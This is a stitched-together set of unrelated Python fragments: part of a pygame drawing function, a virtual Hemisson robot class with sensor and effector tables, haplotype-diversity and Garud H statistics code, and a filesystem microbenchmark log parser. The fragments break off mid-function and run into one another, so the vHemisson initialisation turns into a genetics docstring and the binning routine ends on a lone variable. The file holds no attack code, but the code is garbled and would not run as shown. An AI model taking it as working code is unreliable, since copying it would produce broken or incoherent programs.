h = float(h)
ws = _factorX(w)
hs = _factorY(h)
# If the rectangle is too small, then simply draw a pixel.
if (ws <= 1.0) and (hs <= 1.0):
_pixel(x, y)
else:
xs = _scaleX(x)
ys = _scaleY(y)
pygame.draw.rect(
_surface,
_pygameColor(_penColor),
pygame.Rect(xs, ys-hs, ws, hs),
0)
def square(x, y, r):
"""
Draw on the background canvas a square whose sides are of length
################################################################################
#
# vHemisson.py
#
""" Virtual Hemisson Robot.
Virtual Hemisson Robot shadows the physical Hemisson robot including all
supported I2C modules.
vHemisson is compatible with Hemisson's HemiOS v1.5RNe+ operating system.
Author: <NAME>
Email: <EMAIL>
URL: http://www.roadnarrowsrobotics.com
Date: 2006.03.07
Copyright (C) 2006. RoadNarrows LLC.
"""
#
# All Rights Reserved
#
# Permission is hereby granted, without written agreement and without
# license or royalty fees, to use, copy, modify, and distribute this
# software and its documentation for any purpose, provided that
# (1) The above copyright notice and the following two paragraphs
# appear in all copies of the source code and (2) redistributions
# including binaries reproduces these notices in the supporting
# documentation. Substantial modifications to this software may be
# copyrighted by their authors and need not follow the licensing terms
# described here, provided that the new terms are clearly indicated in
# all files where they apply.
#
# IN NO EVENT SHALL THE AUTHOR, ROADNARROWS LLC, OR ANY MEMBERS/EMPLOYEES
# OF ROADNARROW LLC OR DISTRIBUTORS OF THIS SOFTWARE BE LIABLE TO ANY
# PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL
# DAMAGES ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION,
# EVEN IF THE AUTHORS OR ANY OF THE ABOVE PARTIES HAVE BEEN ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHOR AND ROADNARROWS LLC SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN
# "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
#
################################################################################
import time
import threading as thread
import math
import re
import tkinter as tk
import Fusion.Utils.Tools as utils
import Fusion.Core.Gluon as Gluon
import Fusion.Core.vRobot as vRobot
import Fusion.Core.vRobotThreaded as vRobotThreaded
import Fusion.Gui.GuiTypes as gt
import Fusion.Gui.GuiUtils as gut
import Fusion.Gui.GuiDlgSerConn as GuiDlgSerConn
import Fusion.Gui.GuiWinShell as GuiWinShell
import Fusion.Gui.GuiDlgAbout as GuiDlgAbout
import Fusion.Gui.GuiDlgMsgBox as msgbox
import Fusion.Hemisson.Cmd.HemiCmdBase as HemiBase
import Fusion.Hemisson.Cmd.HemiCmdLinCam as HemiLinCam
import Fusion.Hemisson.Cmd.HemiCmdTts as HemiTts
import Fusion.Hemisson.Cmd.HemiCmdUss as HemiUss
import Fusion.Hemisson.Cmd.HemiCmdAll as HemiCmdAll
import Fusion.Hemisson.Shells.HemiFullShell as HemiCmdShell
import Fusion.Hemisson.Robots.HemiValues as hvals
import Fusion.Hemisson.Robots.HemiIniDD as HemiIniDD
import Fusion.Hemisson.Gui.GuiDlgHemiOpt as GuiDlgHemiOpt
import Fusion.Hemisson.Gui.GuiDlgHemiCalIrLed as GuiDlgHemiCalIrLed
import Fusion.Hemisson.Gui.GuiDlgHemiModLinCam as GuiDlgHemiModLinCam
import Fusion.Hemisson.Gui.GuiDlgHemiModTts as GuiDlgHemiModTts
import Fusion.Hemisson.Gui.GuiDlgHemiModUss as GuiDlgHemiModUss
import Fusion.Hemisson.Gui.GuiWinHemiVizLinCam as GuiWinHemiVizLinCam
import Fusion.Hemisson.Gui.GuiWinHemiVizTts as GuiWinHemiVizTts
import Fusion.Hemisson.Gui.GuiWinHemiVizUss as GuiWinHemiVizUss
#-------------------------------------------------------------------------------
# Global Data
#-------------------------------------------------------------------------------
twopi = 2.0 * math.pi
# sensor converted value, raw value indices
CVTVAL = 0
RAWVAL = 1
#-------------------------------------------------------------------------------
# CLASS: vHemisson
#-------------------------------------------------------------------------------
class vHemisson(vRobotThreaded.vRobotThreaded):
""" Virtual Hemisson Robot Class. """
#--
def __init__(self, client=None, debuglevel=0, debugfout=None):
""" Initialize vHemisson instance.
Parameters:
client - Gluon client
debuglevel - none to all [0, 5] (default: none)
debugfout - opened debug output file (default: stdout)
"""
# base class
vRobotThreaded.vRobotThreaded.__init__(self,
serverId=self.HasName(), client=client,
debuglevel=debuglevel, debugfout=debugfout)
#--
def vRobotInit(self):
""" One-time vRobot initialization during object instantiation. """
# hemisson serial commands
self.mCmd = HemiCmdAll.HemiCmdAll(dbgobj=self.mDbg)
self.mCommIsUp = self.mCmd.IsOpen()
# attached module scan list
self.mModScan = {}
self.mTtsHasChanged = False # work around TTS module bug
# hemisson gui initializations
self.GuiInit()
# common threaded robot initialization (includes ini initialization)
vRobotThreaded.vRobotThreaded.vRobotInit(self)
# add menu bar
self.GSSetServerMenuBarList(self.mMenuBarList)
# add tool bar
self.GSSetServerToolBarList(self.mToolBarList)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# vHemisson Attribute Member Functions
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#--
def IsType(self):
""" Returns the Hemisson robot type.
Return Value:
The Hemisson robot MIME type string.
"""
return hvals.HemiMimeType
#--
def HasName(self):
""" Returns the short vHemisson name(s) string.
Return Value:
The robot name(s) string which may include either or both
the vRobot and physical robot names.
"""
return 'vHemisson'
#--
def IsVersion(self):
""" Returns the vHemisson version(s) string.
Return Value:
The vRobot version(s) string.
"""
return '1.1'
#--
def IsRobotVersion(self):
""" Returns the Hemisson robot version(s) string.
Return Value:
Returns version string if connected.
Else returns 'unknown'.
"""
ver = None
if self.mCommIsUp:
ver = self.mCmd.CmdGetVersion()
if ver:
                m = re.match(r'(HemiOS).*(1\.[5-9][0-9]-RN[e-z])', ver)
if m:
return m.group(2)
else:
self.GSReportErrorStatus("Unsupported Hemisson OS: %s" % repr(ver))
return ver
return 'unknown'
#--
def HasDesc(self):
""" Returns a short description of this vRobot.
Return Value:
Multi-line description string.
"""
sDesc = """\
Hemisson robot with attached Hemisson modules.
Manufactured by K-Team of Switzerland."""
return sDesc
#--
def HasSensorTypes(self):
""" Returns the dictionary of the sensors and their corresponding
properties that are available and supported by this vRobot.
The dictionary is keyed by 'sensorId', which is vRobot unique.
Return Value:
Dictionary of sensor id's and properties in the format:
{sensorId:{'mimetype':<type>...}, ... }
"""
sensorDict = {}
# derived time 'sensor'
sensorDict['time_stamp'] = {
'mimetype': hvals.HemiSensorMimeTypeTime,
'units': 's'
}
sensorDict['dt'] = {
'mimetype': hvals.HemiSensorMimeTypeTime,
'units': 's'
}
# proximity sensors
angrange = math.radians(HemiBase.HemiIrSensorAngRange)
n = 0
for irsensor in HemiBase.HemiIrSensorOrder:
id = 'prox_' + irsensor
zeta = math.radians(HemiBase.HemiIrSensorAngle[n])
sensorDict[id] = {
'mimetype': hvals.HemiSensorMimeTypeProximity,
'zeta': zeta,
'angrange':angrange,
'range': [HemiBase.HemiIrSensorValMin, HemiBase.HemiIrSensorValMax],
'rawunits': 'adc-10bit',
'units': 'mm'
}
n += 1
# ambient sensors
angrange = math.radians(HemiBase.HemiIrSensorAngRange)
n = 0
for irsensor in HemiBase.HemiIrSensorOrder:
id = 'amb_' + irsensor
zeta = math.radians(HemiBase.HemiIrSensorAngle[n])
sensorDict[id] = {
'mimetype': hvals.HemiSensorMimeTypeAmbient,
'zeta': zeta,
'angrange':angrange,
'range': [HemiBase.HemiIrSensorValMin, HemiBase.HemiIrSensorValMax],
'rawunits': 'adc-10bit',
'units': 'mm'
}
n += 1
# speedometers
sensorDict['speedometer_left'] = {
'mimetype': hvals.HemiSensorMimeTypeSpeedometer,
'zeta': math.radians(90),
'range': [HemiBase.HemiSpeedBackwardMax, HemiBase.HemiSpeedForwardMax],
'resolution': 1,
'rawunits': 'dc',
'units': 'unitless'
}
sensorDict['speedometer_right'] = {
'mimetype': hvals.HemiSensorMimeTypeSpeedometer,
'zeta': math.radians(270),
'range': [HemiBase.HemiSpeedBackwardMax, HemiBase.HemiSpeedForwardMax],
'resolution': 1,
'rawunits': 'dc',
'units': 'unitless'
}
sensorDict['pathspeed'] = {
'mimetype': hvals.HemiSensorMimeTypeSpeedometer,
'units': 'unitless'
}
# linear camera
sensorDict['linear_camera'] = {
'mimetype': hvals.HemiSensorMimeTypeLinCam,
'zeta': math.radians(0.0),
'angrange':math.radians(120.0),
'lines': 1,
'width': HemiLinCam.LinCamNumPixels,
'range': [0, 255],
'resolution': 1,
'units': 'gray-level'
}
# ultrasonic sensor
sensorDict['uss'] = {
'mimetype': hvals.HemiSensorMimeTypeUss,
'zeta': math.radians(0.0),
'angrange':math.radians(HemiUss.UssAngRange),
'echoes': HemiUss.UssEchoMaxNum,
'range': [30.0, 6000.0],
'resolution': 43.0,
'units': 'mm'
}
return sensorDict
#--
def HasEffectorTypes(self):
""" Returns the dictionary of the effectors and their corresponding
properties that are available and supported by this vRobot.
The dictionary is keyed by 'effectorId', which is vRobot unique.
Return Value:
Dictionary of effector id's and properties in the format:
{effectorId:{'mimetype':<type>...}, ... }
"""
effectorDict = {}
# motors
effectorDict['motor_left'] = {
'mimetype': hvals.HemiEffectorMimeTypeWheelMotor,
'zeta': math.radians(90),
'resolution': 1,
'range': [HemiBase.HemiSpeedBackwardMax, HemiBase.HemiSpeedForwardMax],
'units': 'unitless'
}
effectorDict['motor_right'] = {
'mimetype': hvals.HemiEffectorMimeTypeWheelMotor,
'zeta': math.radians(270),
'resolution': 1,
'range': [HemiBase.HemiSpeedBackwardMax, HemiBase.HemiSpeedForwardMax],
'units': 'unitless'
}
# LEDs
effectorDict['led0'] = {
'mimetype': hvals.HemiEffectorMimeTypeLed,
'color': 'amber',
'range': [0, 1],
'units': 'off/on'
}
effectorDict['led1'] = {
'mimetype': hvals.HemiEffectorMimeTypeLed,
'color': 'amber',
'range': [0, 1],
'units': 'off/on'
}
# buzzer
effectorDict['buzzer'] = {
'mimetype': hvals.HemiEffectorMimeTypeBuzzer,
'range': [0, 1],
'units': 'off/on'
}
# text-to-speech
        effectorDict['tts'] = {
            'mimetype': hvals.HemiEffectorMimeTypeTts,
            'range': [1, 72],
            'units': 'ascii-chars'
        }
return effectorDict
#--
def HasPhysicalProperties(self):
""" Returns the dictionary of Hemisson physical properties.
Return Value:
Dictionary of physical properties in the format:
{property:<val>, ... }
"""
return {
'diameter': {'val': HemiBase.HemiBaseDiameter, 'units': 'mm'},
'baseweight': {'val': HemiBase.HemiBaseWeight, 'units': 'g'},
'wheelbase': {'val': HemiBase.HemiWheelBase, 'units': 'mm'},
}
#--
def HasBellumGoalControls(self):
""" Returns the maximal list of goal controls (kwGoals) supported
by vHemisson.
Return Value:
List of goal controls.
"""
return ['speed_left', 'speed_right']
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# vHemisson Ini (Re)Initialization Members Functions
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#--
def IniInit(self):
""" Initialize from parsed 'ini' configuration. """
self.mIniDD = HemiIniDD.GetIniDD()
ini = self.GSGetIni()
# load all non-existing ini entries with defaults
for section,sdata in self.mIniDD.items():
optdict = sdata[1]
for option,odata in optdict.items():
if ini.IniGet(section, option) == ini.NullObj:
ini.IniSet(section, option, odata[0])
# load vHemisson run-time options
self.IniInitOpt()
        # load vHemisson connection
shape (n_variants, n_haplotypes)
Haplotype array.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
step : int, optional
The number of variants between start positions of windows. If not
given, defaults to the window size, i.e., non-overlapping windows.
Returns
-------
hd : ndarray, float, shape (n_windows,)
Haplotype diversity.
"""
hd = moving_statistic(values=h, statistic=haplotype_diversity, size=size,
start=start, stop=stop, step=step)
return hd
def garud_h(h):
"""Compute the H1, H12, H123 and H2/H1 statistics for detecting signatures
of soft sweeps, as defined in Garud et al. (2015).
Parameters
----------
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
Returns
-------
h1 : float
H1 statistic (sum of squares of haplotype frequencies).
h12 : float
H12 statistic (sum of squares of haplotype frequencies, combining
the two most common haplotypes into a single frequency).
h123 : float
H123 statistic (sum of squares of haplotype frequencies, combining
the three most common haplotypes into a single frequency).
h2_h1 : float
H2/H1 statistic, indicating the "softness" of a sweep.
"""
# check inputs
h = HaplotypeArray(h, copy=False)
# compute haplotype frequencies
f = h.distinct_frequencies()
# compute H1
h1 = np.sum(f**2)
# compute H12
h12 = np.sum(f[:2])**2 + np.sum(f[2:]**2)
# compute H123
h123 = np.sum(f[:3])**2 + np.sum(f[3:]**2)
# compute H2/H1
h2 = h1 - f[0]**2
h2_h1 = h2 / h1
return h1, h12, h123, h2_h1
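# Illustrative usage sketch (added for clarity; the haplotype values below are
# made up purely for demonstration):
#
#     >>> h = HaplotypeArray([[0, 0, 0, 1],
#     ...                     [0, 1, 0, 1],
#     ...                     [0, 0, 0, 1]])
#     >>> h1, h12, h123, h2_h1 = garud_h(h)
#
# Columns 0 and 2 carry the same haplotype, so its frequency dominates f and
# H1 = sum(f**2) is pulled towards that squared frequency; H12 and H123 pool
# the top two and three haplotype frequencies before squaring, and H2/H1 drops
# the most frequent haplotype to measure how "soft" a sweep is.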
def moving_garud_h(h, size, start=0, stop=None, step=None):
"""Compute the H1, H12, H123 and H2/H1 statistics for detecting signatures
    of soft sweeps, as defined in Garud et al. (2015), in moving windows.
Parameters
----------
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
step : int, optional
The number of variants between start positions of windows. If not
given, defaults to the window size, i.e., non-overlapping windows.
Returns
-------
h1 : ndarray, float, shape (n_windows,)
H1 statistics (sum of squares of haplotype frequencies).
h12 : ndarray, float, shape (n_windows,)
H12 statistics (sum of squares of haplotype frequencies, combining
the two most common haplotypes into a single frequency).
h123 : ndarray, float, shape (n_windows,)
H123 statistics (sum of squares of haplotype frequencies, combining
the three most common haplotypes into a single frequency).
h2_h1 : ndarray, float, shape (n_windows,)
H2/H1 statistics, indicating the "softness" of a sweep.
"""
gh = moving_statistic(values=h, statistic=garud_h, size=size, start=start,
stop=stop, step=step)
h1 = gh[:, 0]
h12 = gh[:, 1]
h123 = gh[:, 2]
h2_h1 = gh[:, 3]
return h1, h12, h123, h2_h1
def plot_haplotype_frequencies(h, palette='Paired', singleton_color='w',
ax=None):
"""Plot haplotype frequencies.
Parameters
----------
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
palette : string, optional
A Seaborn palette name.
singleton_color : string, optional
Color to paint singleton haplotypes.
ax : axes, optional
The axes on which to draw. If not provided, a new figure will be
created.
Returns
-------
ax : axes
"""
import matplotlib.pyplot as plt
import seaborn as sns
# check inputs
h = HaplotypeArray(h, copy=False)
# setup figure
if ax is None:
width = plt.rcParams['figure.figsize'][0]
height = width / 10
fig, ax = plt.subplots(figsize=(width, height))
sns.despine(ax=ax, left=True)
# count distinct haplotypes
hc = h.distinct_counts()
# setup palette
n_colors = np.count_nonzero(hc > 1)
palette = sns.color_palette(palette, n_colors)
# paint frequencies
x1 = 0
for i, c in enumerate(hc):
x2 = x1 + c
if c > 1:
color = palette[i]
else:
color = singleton_color
ax.axvspan(x1, x2, color=color)
x1 = x2
# tidy up
ax.set_xlim(0, h.shape[1])
ax.set_yticks([])
return ax
def moving_hfs_rank(h, size, start=0, stop=None):
"""Helper function for plotting haplotype frequencies in moving windows.
Parameters
----------
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
Returns
-------
hr : ndarray, int, shape (n_windows, n_haplotypes)
Haplotype rank array.
"""
# determine windows
windows = np.asarray(list(index_windows(h, size=size, start=start,
stop=stop, step=None)))
# setup output
hr = np.zeros((windows.shape[0], h.shape[1]), dtype='i4')
# iterate over windows
for i, (window_start, window_stop) in enumerate(windows):
# extract haplotypes for the current window
hw = h[window_start:window_stop]
# count haplotypes
hc = hw.distinct_counts()
# ensure sorted descending
hc.sort()
hc = hc[::-1]
# compute ranks for non-singleton haplotypes
cp = 0
for j, c in enumerate(hc):
if c > 1:
hr[i, cp:cp+c] = j+1
cp += c
return hr
def plot_moving_haplotype_frequencies(pos, h, size, start=0, stop=None, n=None,
palette='Paired', singleton_color='w',
ax=None):
"""Plot haplotype frequencies in moving windows over the genome.
Parameters
----------
pos : array_like, int, shape (n_items,)
Variant positions, using 1-based coordinates, in ascending order.
h : array_like, int, shape (n_variants, n_haplotypes)
Haplotype array.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
n : int, optional
Color only the `n` most frequent haplotypes (by default, all
non-singleton haplotypes are colored).
palette : string, optional
A Seaborn palette name.
singleton_color : string, optional
Color to paint singleton haplotypes.
ax : axes, optional
The axes on which to draw. If not provided, a new figure will be
created.
Returns
-------
ax : axes
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
# setup figure
if ax is None:
fig, ax = plt.subplots()
# compute haplotype frequencies
# N.B., here we use a haplotype rank data structure to enable the use of
# pcolormesh() which is a lot faster than any other type of plotting
# function
hr = moving_hfs_rank(h, size=size, start=start, stop=stop)
# truncate to n most common haplotypes
if n:
hr[hr > n] = 0
# compute window start and stop positions
windows = moving_statistic(pos, statistic=lambda v: (v[0], v[-1]),
size=size, start=start, stop=stop)
# create color map
colors = [singleton_color] + sns.color_palette(palette, n_colors=hr.max())
cmap = mpl.colors.ListedColormap(colors)
# draw colors
x = np.append(windows[:, 0], windows[-1, -1])
y = np.arange(h.shape[1]+1)
ax.pcolormesh(x, y, hr.T, cmap=cmap)
# tidy up
ax.set_xlim(windows[0, 0], windows[-1, -1])
ax.set_ylim(0, h.shape[1])
ax.set_ylabel('haplotype count')
ax.set_xlabel('position (bp)')
return ax
def moving_delta_tajima_d(ac1, ac2, size, start=0, stop=None, step=None):
"""Compute the difference in Tajima's D between two populations in
moving windows.
Parameters
----------
ac1 : array_like, int, shape (n_variants, n_alleles)
Allele counts array for the first population.
ac2 : array_like, int, shape (n_variants, n_alleles)
Allele counts array for the second population.
size : int
The window size (number of variants).
start : int, optional
The index at which to start.
stop : int, optional
The index at which to stop.
step : int, optional
The number of variants between start positions of windows. If not
given, defaults to the window size, i.e., non-overlapping windows.
Returns
-------
delta_d : ndarray, float, shape (n_windows,)
Standardized delta Tajima's D.
See Also
--------
allel.stats.diversity.moving_tajima_d
"""
d1 = moving_tajima_d(ac1, size=size, start=start, stop=stop, step=step)
d2 = moving_tajima_d(ac2, size=size, start=start, stop=stop, step=step)
delta = d1 - d2
delta_z = (delta - np.mean(delta)) / np.std(delta)
return delta_z
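# Note (added for clarity): the returned values are z-scores -- the per-window
# difference delta = D1 - D2 is standardised across all windows as
# delta_z = (delta - mean(delta)) / std(delta), so strongly positive values
# mark windows where population 1 has unusually higher Tajima's D than
# population 2 relative to the rest of the region.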
def make_similar_sized_bins(x, n):
"""Utility function to create a set of bins over the range of values in `x`
such that each bin contains roughly the same number of values.
Parameters
----------
x : array_like
The values to be binned.
n : int
The number of bins to create.
Returns
-------
bins : ndarray
An array of bin edges.
Notes
-----
The actual number of bins returned may be less than `n` if `x` contains
integer values and any single value is represented more than len(x)//n
times.
"""
# copy and sort the array
y = np.array(x).flatten()
y.sort()
# setup bins
bins = [y[0]]
# determine step size
step = len(y) // n
# add bin edges
for i in range(step, len(y), step):
# get value at this index
        v
#!/usr/bin/env python3
# encoding: utf-8
# This script parses microbench logs and generates a .csv for each workload
import logging
import pandas as pd
import re
import os
import argparse
import datetime
import statistics
def get_max_num_app():
return 10
def get_YEAR():
return datetime.date.today().year
def is_fsp(fstype):
return 'fsp' in fstype
def get_syncop_num():
return 4
def bench_has_fg_sync(job):
job_list = ['ADPS', 'ADSS']
return job in job_list
def filter_listdir_dir(job, cur_dir_list):
job_list = ['SaMP', 'SaMS', 'LsMP', 'LsMS']
result_list = []
if job in job_list:
for name in cur_dir_list:
cur_name = name.split('/')[-1]
if 'listdir' in cur_name:
result_list.append(name)
return result_list
else:
return cur_dir_list
def get_default_benchmarks():
benchmarks = [
'RMPR',
'RMSR',
'RDPR',
'RDSR',
'RMPS',
'RMSS',
'RDPS',
'RDSS',
'WMPS',
'WMSS',
'AMPS',
'AMSS',
'WMPR',
'WMSR',
'WDPS',
'WDPR',
'WDSS',
'WDSR',
'ADPS',
'ADSS',
'S1MP',
'S1MS',
'SaMP',
'SaMS',
'LsMP',
'LsMS',
'CMP',
'CMS',
'UMP',
'UMS',
'RMP',
'RMS',
]
return benchmarks
def get_bench_job_title(job_name):
titles = {
'RMPR': 'RandRead-Mem-P',
'RMSR': 'RandRead-Mem-S',
'RDPR': 'RandRead-Disk-P',
'RDSR': 'RandRead-Disk-S',
'RMPS': 'SeqRead-Mem-P',
'RMSS': 'SeqRead-Mem-S',
'RDPS': 'SeqRead-Disk-P',
'RDSS': 'SeqRead-Disk-S',
'WMPS': 'SeqWrite-Mem-P',
'WMSS': 'SeqWrite-Mem-S',
'AMPS': 'Append-Mem-P',
'AMSS': 'Append-Mem-S',
'WMPR': 'RandWrite-Mem-P',
'WMSR': 'RandWrite-Mem-S',
'WDPS': 'SeqWRite-Disk-P',
'WDPR': 'RandWrite-Disk-P',
'WDSS': 'SeqWrite-Disk-S',
'WDSR': 'RandWrite-Disk-S',
'ADPS': 'Append-Disk-P',
'ADSS': 'Append-Disk-S',
'S1MP': 'Stat1-Mem-P',
'S1MS': 'Stat1-Mem-S',
'SaMP': 'StatAll-Mem-P',
'SaMS': 'StatAll-Mem-S',
'LsMP': 'Listdir-Mem-P',
'LsMS': 'Listdir-Mem-S',
'CMP': 'Create-Mem-P',
'CMS': 'Create-Mem-S',
'UMP': 'Unlink-Mem-P',
'UMS': 'Unlink-Mem-S',
'RMP': 'Rename-Mem-P',
'RMS': 'Rename-Mem-S',
}
return titles[job_name]
def get_dir_name_list_match_pattern(dir_name, reg_str):
pattern = re.compile(reg_str)
match_list = []
logging.debug('==> try match {} {}'.format(dir_name, reg_str))
assert (os.path.exists(dir_name))
for name in os.listdir(dir_name):
if pattern.match(name):
match_list.append('{}/{}'.format(dir_name, name))
return match_list
def process_fsp_out(out_name):
row_col_name_list = [
'firstNs', 'lastNs', 'intervalNs', 'bytes', 'numop', 'iops', 'bw'
]
row_list = []
with open(out_name) as f:
cur_row_dict = None
wid = None
for line in f:
line = line.strip()
items = line.split()
if 'wid:' in line:
if wid is None:
wid = int(items[-2].split(':')[1])
continue
if '===> stats ===>' in line:
if cur_row_dict is not None:
row_list.append(
[cur_row_dict[k] for k in row_col_name_list])
                cur_row_dict = {n: 0 for n in row_col_name_list}
if 'iops:' in line:
bw_item = items[-1]
iops_item = items[-2]
cur_row_dict['bw'] = float(bw_item.split(':')[1])
cur_row_dict['iops'] = float(iops_item.split(':')[1])
continue
if 'firstNs:' in line:
cur_row_dict['numop'] = int((items[-1]).split(':')[1])
cur_row_dict['bytes'] = int((items[-2]).split(':')[1])
cur_row_dict['lastNs'] = float((items[-4]).split(':')[1])
cur_row_dict['firstNs'] = float((items[-5]).split(':')[1])
cur_row_dict['intervalNs'] = float((items[-3]).split(':')[1])
continue
if 'stats' not in line:
continue
# add the last row
row_list.append([cur_row_dict[k] for k in row_col_name_list])
df = pd.DataFrame(row_list, columns=row_col_name_list)
return df
def process_bench_log(log_name):
row_list = []
row_col_list = [
'size', 'numop', 'iops', 'ltc_stddev', 'bw', 'avg_ltc', 'med_ltc',
'ltc99', 'ltc999'
]
with open(log_name) as f:
cur_row_dict = None
for line in f:
line = line.strip()
items = line.split()
if 'Values:' in line:
if cur_row_dict is not None:
row_list.append(
[cur_row_dict[k] for k in cur_row_dict.keys()])
cur_row_dict = {n: 0 for n in row_col_list}
cur_size = int(items[1])
cur_row_dict['size'] = cur_size
if 'Entries:' in line:
cur_numop = int(items[1])
cur_row_dict['numop'] = cur_numop
if 'micros/op' in line:
assert ('micros/op' in items[3])
cur_microsop = float(items[2])
cur_iops = 1e6 / cur_microsop
cur_row_dict['iops'] = cur_iops
if 'MB/s' in line:
cur_bw = float(items[4])
cur_row_dict['bw'] = cur_bw
else:
cur_row_dict['bw'] = 0
if 'Average:' in line:
assert ('Average' in items[2])
cur_avg_ltc = float(items[3])
cur_ltc_stddev = float(items[5])
cur_row_dict['avg_ltc'] = cur_avg_ltc
cur_row_dict['ltc_stddev'] = cur_ltc_stddev
if 'Median:' in line:
assert ('Median' in items[2])
cur_med_ltc = float(items[3])
cur_row_dict['med_ltc'] = cur_med_ltc
if '%' in line:
pct_item = items[6]
pct = float(pct_item[:-1])
if pct >= 98.9999999 and cur_row_dict['ltc99'] == 0:
cur_row_dict['ltc99'] = float(items[2])
if pct >= 99.8999999 and cur_row_dict['ltc999'] == 0:
cur_row_dict['ltc999'] = float(items[2])
row_list.append([cur_row_dict[k] for k in cur_row_dict.keys()])
df = pd.DataFrame(row_list, columns=row_col_list)
return row_list, row_col_list, df
def process_fsp_log_cpu(fname, sample_k=None, cal_mean_sec_range=None):
per_worker_series_dict = {}
first_nano = None
per_worker_idx = {}
with open(fname) as f:
for line in f:
line = line.strip()
if '[KPLoadStatsSummary]' not in line:
continue
if 'invalidateAppShmByName' in line:
break
if 'BlkDevSpdk' in line:
continue
if '[warning]' in line:
continue
if 'FsProc.cc' in line:
continue
if 'cpu_ut:' in line:
items = line.split()
wid_item = items[1]
nano_item = items[2]
utilization_item = items[-3]
wid = int(wid_item[len('wid:'):])
nano = int(nano_item[len('real_nano:'):])
if first_nano is None:
first_nano = nano
utilization = float(utilization_item[len('cpu_ut:'):])
if wid not in per_worker_series_dict:
per_worker_series_dict[wid] = ([], [])
per_worker_idx[wid] = 0
if sample_k is not None and per_worker_idx[wid] % sample_k != 0:
per_worker_idx[wid] += 1
continue
cur_sec = (nano - first_nano) * 1e-9
if cal_mean_sec_range is not None and cur_sec > cal_mean_sec_range:
break
per_worker_series_dict[wid][0].append(
(nano - first_nano) * 1e-9)
per_worker_series_dict[wid][1].append(utilization)
per_worker_idx[wid] += 1
if cal_mean_sec_range is not None:
num_worker = len(per_worker_series_dict)
per_worker_avg = {}
for wid, wid_ut_tp in per_worker_series_dict.items():
per_worker_avg[wid] = statistics.mean(
wid_ut_tp[1]) if len(wid_ut_tp[1]) != 0 else 0
total_ut = sum(list(per_worker_avg.values()))
mean_ut = total_ut / num_worker
return mean_ut, total_ut, num_worker
else:
return per_worker_series_dict
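# Note (added for clarity): when cal_mean_sec_range is given, only samples from
# the first cal_mean_sec_range seconds are kept and the function returns
# (mean utilization across workers, summed utilization, number of workers);
# otherwise it returns the raw per-worker {wid: (seconds, utilization)} time
# series, which is more convenient for plotting.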
def merge_rows_from_apps(row_ll, df_list, cur_row_col_list, num_app,
size_list):
"""
merge the row_list generated from each App's benchmark log
"""
rt_dict = {}
for i in range(len(size_list)):
for j in range(num_app):
cur_app_size_row = row_ll[j][i]
cur_sz = size_list[i]
if cur_sz not in rt_dict:
rt_dict[cur_sz] = {}
for k in range(len(cur_row_col_list)):
cur_col_key = cur_row_col_list[k]
# if cur_col_key == 'size':
# continue
if cur_col_key not in rt_dict[cur_sz]:
rt_dict[cur_sz][cur_col_key] = []
rt_dict[cur_sz][cur_col_key].append(cur_app_size_row[k])
def from_row_dict_to_row(row_dict, cur_sz):
cur_row = [0 for i in range(len(cur_row_col_list))]
for k, v in row_dict.items():
assert (len(v) == num_app)
if k == 'size':
cur_row[cur_row_col_list.index('size')] = cur_sz
elif k == 'numop':
cur_row[cur_row_col_list.index(k)] = sum(v)
elif k == 'iops':
cur_row[cur_row_col_list.index(k)] = sum(v)
elif k == 'bw':
cur_row[cur_row_col_list.index(k)] = sum(v)
elif k == 'avg_ltc':
cur_row[cur_row_col_list.index(k)] = statistics.mean(v)
else:
# latency we use median (p99, med)
cur_row[cur_row_col_list.index(k)] = statistics.median(v)
return cur_row
row_list = [from_row_dict_to_row(rt_dict[sz], sz) for sz in size_list]
df = pd.DataFrame(row_list, columns=cur_row_col_list)
return df
def process_one_expr_dir(dir_name,
num_app,
num_fsp_worker,
is_fsp=True,
cpu_ut=False,
sz=None):
if sz is not None:
bench_log_names = [
f'{dir_name}/bench_log_{sz}_{i}' for i in range(num_app)
]
else:
bench_log_names = [f'{dir_name}/bench_log_{i}' for i in range(num_app)]
cpu_ut_out = None
row_ll = []
df_list = []
for bench_log_name in bench_log_names:
cur_row_list, cur_row_colname_list, cur_df = process_bench_log(
bench_log_name)
row_ll.append(cur_row_list)
df_list.append(cur_df)
app_summary_df = merge_rows_from_apps(row_ll, df_list,
cur_row_colname_list, num_app,
list(cur_df['size']))
if is_fsp:
fsp_out_df = None
for cur_size in sorted(list(cur_df['size'])):
wid_list = range(num_fsp_worker)
worker_out_names = [
f'{dir_name}/fsp_out_size{cur_size}/worker-{wid}-logger.out'
for wid in wid_list
]
for i in range(len(wid_list)):
worker_out_name = worker_out_names[i]
if not os.path.exists(worker_out_name):
continue
wid = wid_list[i]
cur_df = process_fsp_out(worker_out_name)
cur_df['size'] = int(cur_size)
cur_df['wid'] = int(wid)
if fsp_out_df is None:
fsp_out_df = cur_df
else:
fsp_out_df = pd.concat([cur_df, fsp_out_df])
# display(fsp_out_df)
if cpu_ut:
if sz is not None:
fsp_log_name = f'{dir_name}/fsp_log_{sz}'
else:
